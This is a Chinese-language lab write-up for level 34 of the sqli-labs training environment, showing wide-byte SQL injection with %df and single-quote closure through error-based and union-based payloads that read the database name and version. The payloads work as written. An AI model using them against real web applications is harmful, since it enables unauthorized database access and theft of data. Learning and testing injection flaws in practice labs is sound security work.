sqllab第三十四关通关笔记

知识点:

  • 宽字节注入+单引号闭合
  • 注意:不能直接在输入框进行宽字节注入,会被url编码,除非输入原始字符(%df已经是url编码了,直接输入会二次编码)
  • 错误注入
    • payload:username=1%df'or+extractvalue(1,concat(0x7e,database(),0x7e))=1--+
  • 联合注入
    • payload:username=1%df'union+select+database(),version()--+

通过抓包进行测试,发现是一个宽字节注入+单引号闭合

构造payload:username=1%df'or+1=1--+

成功显示出了id=1的用户信息

利用错误注入进行尝试

构造payload:username=1%df'or+exp(710)=1--+

界面成功回显了错误信息;说明可以进行错误注入

尝试读取数据库名

构造payload:username=1%df'or+extractvalue(1,concat(0x7e,database(),0x7e))=1--+

成功获取了数据库名;同样的可以获取数据库的其他信息

尝试进行联合注入

构造payload:username=1%df'union+select+1,2--+

输入内容成功显示到了屏幕上

利用联合注入获取数据库名和版本信息

构造payload:username=1%df'union+select+database(),version()--+

成功获取了数据库名和版本信息,同样手段可以获取数据库其他内容

10

相关推荐
今天你TLE了吗8 分钟前
JVM学习笔记:第九章——StringTable字符串常量池
java·jvm·笔记·后端·学习
Amazing_Cacao10 分钟前
品鉴师高级|全局判断成体系(精品可可,精品巧克力)
笔记·学习
1104.北光c°12 分钟前
JVM虚拟机【八股篇】:类加载机制与性能调优
java·开发语言·jvm·笔记·程序人生·调优·双亲委派
有个人神神叨叨22 分钟前
DeerFlow 项目笔记
笔记
zhaoyin199431 分钟前
JavaScript面试题笔记
java·javascript·笔记
朱一头zcy1 小时前
Java基础复习03:面向对象基础入门(类与对象的概念 构造器 this关键字)
java·笔记
左左右右左右摇晃1 小时前
静态代理与动态代理
笔记
困死,根本不会1 小时前
Electron 开发环境搭建超详细学习笔记
笔记·学习·electron
chushiyunen1 小时前
django日志使用笔记
数据库·笔记·django
小乔的编程内容分享站1 小时前
C语言笔记之结构体第二篇
c语言·开发语言·笔记